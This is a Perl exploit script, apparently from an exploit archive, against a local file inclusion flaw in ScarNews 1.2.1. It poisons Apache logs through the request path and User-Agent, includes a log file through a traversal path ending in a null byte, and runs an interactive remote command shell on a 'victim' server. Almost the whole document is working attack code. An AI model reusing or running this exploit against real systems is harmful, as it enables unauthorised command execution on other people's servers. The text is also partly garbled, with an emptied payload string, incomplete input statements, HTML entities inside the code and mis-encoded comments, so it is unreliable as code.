ScarNews 1.2.1 (sn_admin_dir) Local File Inclusion Exploit

                                                #Perl
#
#BeyazKurt
#
#ScarNews (sn_admin_dir) Local File Inclusion Exploit
#
# D0rk     : \"Powered by ScarNews v1.2.1\" dorka gerenk yok ama nese :p
# kodlad...m 2 scriptte di.er makinayla uctu :( :(
#
#Str0ke 鼁me kendini olur b鰈e .eler :)
#
#Download : http://www.scar4u.de/scripts/scarnews/download.html
#
#Coded by elden ele ge鏸o :)
#
# Shikaa get t黵k鏴 kas :D bi laf anlatcaz anlam.on a.g nese hotmail xss\'leri s鰉黵 s鰉黵ebild.in #kadar :D
#
use IO::Socket;
use LWP::Simple;
#ripped
@apache=(
\"../../../../../var/log/httpd/access_log\",
\"../../../../../var/log/httpd/error_log\",
\"../apache/logs/error.log\",
\"../apache/logs/access.log\",
\"../../apache/logs/error.log\",
\"../../apache/logs/access.log\",
\"../../../apache/logs/error.log\",
\"../../../apache/logs/access.log\",
\"../../../../apache/logs/error.log\",
\"../../../../apache/logs/access.log\",
\"../../../../../apache/logs/error.log\",
\"../../../../../apache/logs/access.log\",
\"../logs/error.log\",
\"../logs/access.log\",
\"../../logs/error.log\",
\"../../logs/access.log\",
\"../../../logs/error.log\",
\"../../../logs/access.log\",
\"../../../../logs/error.log\",
\"../../../../logs/access.log\",
\"../../../../../logs/error.log\",
\"../../../../../logs/access.log\",
\"../../../../../etc/httpd/logs/access_log\",
\"../../../../../etc/httpd/logs/access.log\",
\"../../../../../etc/httpd/logs/error_log\",
\"../../../../../etc/httpd/logs/error.log\",
\"../../.. /../../var/www/logs/access_log\",
\"../../../../../var/www/logs/access.log\",
\"../../../../../usr/local/apache/logs/access_log\",
\"../../../../../usr/local/apache/logs/access.log\",
\"../../../../../var/log/apache/access_log\",
\"../../../../../var/log/apache/access.log\",
\"../../../../../var/log/access_log\",
\"../../../../../var/www/logs/error_log\",
\"../../../../../var/www/logs/error.log\",
\"../../../../../usr/local/apache/logs/error_log\",
\"../../../../../usr/local/apache/logs/error.log\",
\"../../../../../var/log/apache/error_log\",
\"../../../../../var/log/apache/error.log\",
\"../../../../../var/log/access_log\",
\"../../../../../var/log/error_log\"
);
if&nbsp;(@ARGV&nbsp;<&nbsp;3)&nbsp;{
print&nbsp;\"
ScarNews&nbsp;(sn_admin_dir)&nbsp;Local&nbsp;File&nbsp;Inclusion&nbsp;Exploit
###############################################################
Kullan.m&nbsp;:&nbsp;exploit.pl&nbsp;[victim]&nbsp;[apachepath]
###############################################################
\";
exit();
}
$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];
print&nbsp;\"Code&nbsp;is&nbsp;injecting&nbsp;in&nbsp;logfiles...
\";
$CODE=\"\";
$socket&nbsp;=&nbsp;IO::Socket::INET->new(Proto=>\"tcp\",&nbsp;PeerAddr=>\"$host\",&nbsp;PeerPort=>\"80\")&nbsp;or&nbsp;die&nbsp;\"Connection&nbsp;failed.

\";
print&nbsp;$socket&nbsp;\"GET&nbsp;\".$path.$CODE.\"&nbsp;HTTP/1.1
\";
print&nbsp;$socket&nbsp;\"user-Agent:&nbsp;\".$CODE.\"
\";
print&nbsp;$socket&nbsp;\"Host:&nbsp;\".$host.\"
\";
print&nbsp;$socket&nbsp;\"Connection:&nbsp;close

\";
close($socket);
print&nbsp;\"Write&nbsp;END&nbsp;to&nbsp;exit!
\";
print&nbsp;\"If&nbsp;not&nbsp;working&nbsp;try&nbsp;another&nbsp;apache&nbsp;path

\";
print&nbsp;\"[shell]&nbsp;\";$cmd&nbsp;=&nbsp;;
while($cmd&nbsp;!~&nbsp;\"END\")&nbsp;{
$socket&nbsp;=&nbsp;IO::Socket::INET->new(Proto=>\"tcp\",&nbsp;PeerAddr=>\"$host\",&nbsp;PeerPort=>\"80\")&nbsp;or&nbsp;die&nbsp;\"Connection&nbsp;failed.

\";
#now&nbsp;include&nbsp;parameter
print&nbsp;$socket&nbsp;\"GET&nbsp;\".$path.\"scarnews.inc.php?sn_admin_dir=\".$apache[$apachepath].\"%00&cmd=$cmd&nbsp;HTTP/1.1
\";
print&nbsp;$socket&nbsp;\"Host:&nbsp;\".$host.\"
\";
print&nbsp;$socket&nbsp;\"Accept:&nbsp;*/*
\";
print&nbsp;$socket&nbsp;\"Connection:&nbsp;close

\";
while&nbsp;($raspuns&nbsp;=&nbsp;<$socket>)
{
print&nbsp;$raspuns;
}
print&nbsp;\"[shell]&nbsp;\";
$cmd&nbsp;=&nbsp;;
}

&nbsp;